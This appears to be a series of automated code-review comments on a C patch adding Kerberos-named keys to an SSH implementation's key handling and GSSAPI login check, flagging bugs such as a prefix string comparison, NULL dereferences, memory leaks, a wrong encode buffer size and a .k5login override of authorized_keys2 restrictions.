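Review bot: in key_equal() (@@ -146,6 +155,17 @@) the type comparison `strncmp(a->name_type, b->name_type, strlen(b->name_type)) == 0` is a prefix test, so an entry typed krb5 compares equal to an authenticator typed krb5x whenever the shorter string is on the b side; use strcmp(). The two `return` expressions in the case are identical, so compute the name comparison once and decide on the type first.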
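Review bot: in the first key_read() hunk (@@ -397,6 +419,17 @@) the else branch reads `name_type == NULL;`, a comparison whose result is discarded rather than an assignment; it is harmless only because name_type was set to NULL at the top, so either make it `name_type = NULL;` or delete the branch. The debug3() there prints the `colon` pointer with %x, which truncates on 64-bit targets; use %p or print `colon - cp`.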
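Review bot: in the second key_read() hunk (@@ -414,26 +447,60 @@) the literal-name branch does `space = strchr(cp, '\n')` and later unconditionally `*space = '\n';`, so a final line without a trailing newline dereferences NULL; guard the restore with `if (space != NULL)`. In the uudecoded branch `k->name_len = strlen(blob)` and the `%s` debug print treat the decoded bytes as a NUL-terminated string, which defeats the reason for encoding names that may contain NUL or non-ASCII bytes; use n. On the error returns in this hunk the earlier xstrdup()'d name_type is leaked, and the commented-out free of ret->name means re-reading into an existing Key leaks as well.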
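Review bot: in key_write() (@@ -498,6 +565,19 @@) uuencode() is given `key->name_len` as the target size although `uu` was allocated with 2*(key->name_len); base64 output is 4/3 of the input, so anything but a very short name fails to encode. Pass `2*(key->name_len)`. `blob = xstrdup(key->name)` stops at the first NUL byte and is unnecessary, uuencode() can read key->name directly. Also key_ssh_name() returns the bare "ssh-ext-named", so the `:krb5` type suffix key_read() accepts is lost on write; emit `%s:%s` when name_type is set.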
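Review bot: key_from_private() (@@ -604,6 +690,11 @@) copies name and name_len but not name_type, so the copy compares as an untyped name in key_equal() and key_free() on it reads an indeterminate pointer; xstrdup() name_type when it is non-NULL and set it to NULL otherwise.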
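Review bot: in ssh_gssapi_krb5_userok() (gss-serv.c, @@ -124,27 +124,41 @@) `user_key_allowed(getpwnam(name), &k)` passes getpwnam()'s result without a NULL check, and the stack `Key k` only has type, name, name_len and name_type set, leaving rsa and dsa indeterminate; memset it or build it with key_new()/key_free(). The final `return retval | retval2;` also means any principal listed in ~/.k5login logs in regardless of what authorized_keys2 says, so the from=/command= options that motivated this change cannot restrict such a principal; either let an authorized_keys2 entry take precedence when one exists or document that .k5login is the override.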